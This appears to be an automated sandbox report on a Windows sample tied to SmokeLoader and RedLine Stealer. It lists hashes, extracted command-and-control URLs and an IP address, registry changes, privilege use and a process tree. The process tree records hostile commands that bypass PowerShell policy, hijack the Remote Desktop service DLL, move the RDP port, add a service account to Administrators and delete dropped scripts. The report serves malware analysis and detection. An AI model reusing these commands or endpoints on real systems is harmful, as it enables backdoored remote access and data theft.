Analysis
max time kernel: 150s
max time network: 148s
platform: windows10_x64
resource: win10-en-20211208
submitted: 10-12-2021 02:42
Static task: static1
Behavioral task: behavioral1
Sample: 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
Resource: win10-en-20211208
General
Target: 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
Size: 218KB
MD5: 26d0fb61e2a20ede3a49f4d6246b64cd
SHA1: eddaaa5c7dd217a818d57c216277cf081232dba6
SHA256: 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e
SHA512: f792ec1033410eaca68b3e882a54211f3a4d48b0416170b8a69dc0a22b970bef5e49879d4569a53c268609e5c8f433d80a47697828ce7f876e39e5837d90822a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\5679.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\5679.exe | family_redline
behavioral1/memory/4308-132-0x00000000011F0000-0x000000000125C000-memory.dmp | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
flow | pid | process
96 | 224 | powershell.exe
98 | 224 | powershell.exe
99 | 224 | powershell.exe
101 | 224 | powershell.exe
103 | 224 | powershell.exe
105 | 224 | powershell.exe
107 | 224 | powershell.exe
109 | 224 | powershell.exe
111 | 224 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
pid | process
4384 | 5679.exe
4308 | 7A4D.exe
2136 | C91A.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
-
Deletes itself 1 IoCs
Processes:
pid | process
396 | (process name not recorded)
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
3040 | (process name not recorded)
3040 | (process name not recorded)
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid | process
4308 | 7A4D.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
-
Drops file in Windows directory 19 IoCs
Processes:
description | ioc | process
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C7C.tmp | powershell.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xrsqowxr.irz.ps1 | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C5B.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C6B.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mn10cpp0.m3m.psm1 | powershell.exe
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C3A.tmp | powershell.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C5A.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 98 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 99 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 101 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 103 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
3380 | 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
3380 | 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
396 | (process name not recorded; pid 396 accounts for all remaining entries of this signature)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
396 | (process name not recorded)
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
628 | (process name not recorded)
628 | (process name not recorded)
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid | process
3380 | 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeShutdownPrivilege | 396 | (process name not recorded)
Token: SeCreatePagefilePrivilege | 396 | (process name not recorded)
Token: SeShutdownPrivilege | 396 | (process name not recorded)
Token: SeCreatePagefilePrivilege | 396 | (process name not recorded)
Token: SeDebugPrivilege | 1504 | powershell.exe
Token: SeDebugPrivilege | 4844 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4844 | powershell.exe
Token: SeSecurityPrivilege | 4844 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4844 | powershell.exe
Token: SeLoadDriverPrivilege | 4844 | powershell.exe
Token: SeSystemProfilePrivilege | 4844 | powershell.exe
Token: SeSystemtimePrivilege | 4844 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4844 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4844 | powershell.exe
Token: SeCreatePagefilePrivilege | 4844 | powershell.exe
Token: SeBackupPrivilege | 4844 | powershell.exe
Token: SeRestorePrivilege | 4844 | powershell.exe
Token: SeShutdownPrivilege | 4844 | powershell.exe
Token: SeDebugPrivilege | 4844 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4844 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4844 | powershell.exe
Token: SeUndockPrivilege | 4844 | powershell.exe
Token: SeManageVolumePrivilege | 4844 | powershell.exe
Token: 33 | 4844 | powershell.exe
Token: 34 | 4844 | powershell.exe
Token: 35 | 4844 | powershell.exe
Token: 36 | 4844 | powershell.exe
Token: SeDebugPrivilege | 5088 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 5088 | powershell.exe
Token: SeSecurityPrivilege | 5088 | powershell.exe
Token: SeTakeOwnershipPrivilege | 5088 | powershell.exe
Token: SeLoadDriverPrivilege | 5088 | powershell.exe
Token: SeSystemProfilePrivilege | 5088 | powershell.exe
Token: SeSystemtimePrivilege | 5088 | powershell.exe
Token: SeProfSingleProcessPrivilege | 5088 | powershell.exe
Token: SeIncBasePriorityPrivilege | 5088 | powershell.exe
Token: SeCreatePagefilePrivilege | 5088 | powershell.exe
Token: SeBackupPrivilege | 5088 | powershell.exe
Token: SeRestorePrivilege | 5088 | powershell.exe
Token: SeShutdownPrivilege | 5088 | powershell.exe
Token: SeDebugPrivilege | 5088 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 5088 | powershell.exe
Token: SeRemoteShutdownPrivilege | 5088 | powershell.exe
Token: SeUndockPrivilege | 5088 | powershell.exe
Token: SeManageVolumePrivilege | 5088 | powershell.exe
Token: 33 | 5088 | powershell.exe
Token: 34 | 5088 | powershell.exe
Token: 35 | 5088 | powershell.exe
Token: 36 | 5088 | powershell.exe
Token: SeDebugPrivilege | 2440 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2440 | powershell.exe
Token: SeSecurityPrivilege | 2440 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2440 | powershell.exe
Token: SeLoadDriverPrivilege | 2440 | powershell.exe
Token: SeSystemProfilePrivilege | 2440 | powershell.exe
Token: SeSystemtimePrivilege | 2440 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2440 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2440 | powershell.exe
Token: SeCreatePagefilePrivilege | 2440 | powershell.exe
Token: SeBackupPrivilege | 2440 | powershell.exe
Token: SeRestorePrivilege | 2440 | powershell.exe
Token: SeShutdownPrivilege | 2440 | powershell.exe
Token: SeDebugPrivilege | 2440 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2440 | powershell.exe
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid | process
396 | (process name not recorded)
396 | (process name not recorded)
-
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid | process
396 | (process name not recorded)
396 | (process name not recorded)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 396 wrote to memory of 4384 | 396 | (process name not recorded) | 5679.exe (3 entries)
PID 396 wrote to memory of 4308 | 396 | (process name not recorded) | 7A4D.exe (3 entries)
PID 396 wrote to memory of 2136 | 396 | (process name not recorded) | C91A.exe (2 entries)
PID 2136 wrote to memory of 1504 | 2136 | C91A.exe | powershell.exe (2 entries)
PID 1504 wrote to memory of 2708 | 1504 | powershell.exe | csc.exe (2 entries)
PID 2708 wrote to memory of 2760 | 2708 | csc.exe | cvtres.exe (2 entries)
PID 1504 wrote to memory of 3580 | 1504 | powershell.exe | csc.exe (2 entries)
PID 3580 wrote to memory of 3140 | 3580 | csc.exe | cvtres.exe (2 entries)
PID 1504 wrote to memory of 4844 | 1504 | powershell.exe | powershell.exe (2 entries)
PID 1504 wrote to memory of 5088 | 1504 | powershell.exe | powershell.exe (2 entries)
PID 1504 wrote to memory of 2440 | 1504 | powershell.exe | powershell.exe (2 entries)
PID 1504 wrote to memory of 2984 | 1504 | powershell.exe | reg.exe (2 entries)
PID 1504 wrote to memory of 1992 | 1504 | powershell.exe | reg.exe (2 entries)
PID 1504 wrote to memory of 3712 | 1504 | powershell.exe | reg.exe (2 entries)
PID 1504 wrote to memory of 2820 | 1504 | powershell.exe | net.exe (2 entries)
PID 2820 wrote to memory of 3440 | 2820 | net.exe | net1.exe (2 entries)
PID 1504 wrote to memory of 3204 | 1504 | powershell.exe | cmd.exe (2 entries)
PID 3204 wrote to memory of 1180 | 3204 | cmd.exe | cmd.exe (2 entries)
PID 1180 wrote to memory of 4316 | 1180 | cmd.exe | net.exe (2 entries)
PID 4316 wrote to memory of 4260 | 4316 | net.exe | net1.exe (2 entries)
PID 1504 wrote to memory of 4232 | 1504 | powershell.exe | cmd.exe (2 entries)
PID 4232 wrote to memory of 4280 | 4232 | cmd.exe | cmd.exe (2 entries)
PID 4280 wrote to memory of 4428 | 4280 | cmd.exe | net.exe (2 entries)
PID 4428 wrote to memory of 4404 | 4428 | net.exe | net1.exe (2 entries)
PID 580 wrote to memory of 3312 | 580 | cmd.exe | net.exe (2 entries)
PID 3312 wrote to memory of 3808 | 3312 | net.exe | net1.exe (2 entries)
PID 4272 wrote to memory of 408 | 4272 | cmd.exe | net.exe (2 entries)
PID 408 wrote to memory of 1500 | 408 | net.exe | net1.exe (2 entries)
PID 1820 wrote to memory of 2480 | 1820 | cmd.exe | net.exe (2 entries)
PID 2480 wrote to memory of 2656 | 2480 | net.exe | net1.exe (2 entries)
PID 2776 wrote to memory of 2688 | 2776 | cmd.exe | net.exe (2 entries)
Processes
-
C:\Users\Admin\AppData\Local\Temp\25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe (depth 1)
command line: "C:\Users\Admin\AppData\Local\Temp\25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\5679.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\5679.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7A4D.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\7A4D.exe
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\C91A.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\C91A.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lr4k5ras\lr4k5ras.cmdline"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDED3.tmp" "c:\Users\Admin\AppData\Local\Temp\lr4k5ras\CSC5C40ACA4BE2147D9BD68D9DAF850F52C.TMP"
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xqe10l4e\xqe10l4e.cmdline"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3F3.tmp" "c:\Users\Admin\AppData\Local\Temp\xqe10l4e\CSC3BEEE61E154A1387A84C6526928EB.TMP"
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe (depth 3)
command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
-
C:\Windows\system32\reg.exe (depth 3)
command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 3)
command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
-
C:\Windows\system32\net.exe (depth 3)
command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 4)
command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
-
C:\Windows\system32\cmd.exe (depth 3)
command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe (depth 4)
command line: cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 5)
command line: net start rdpdr
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 6)
command line: C:\Windows\system32\net1 start rdpdr
-
C:\Windows\system32\cmd.exe (depth 3)
command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe (depth 4)
command line: cmd /c net start TermService
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 5)
command line: net start TermService
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 6)
command line: C:\Windows\system32\net1 start TermService
-
C:\Windows\system32\cmd.exe (depth 3)
command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
-
C:\Windows\system32\cmd.exe (depth 3)
command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
-
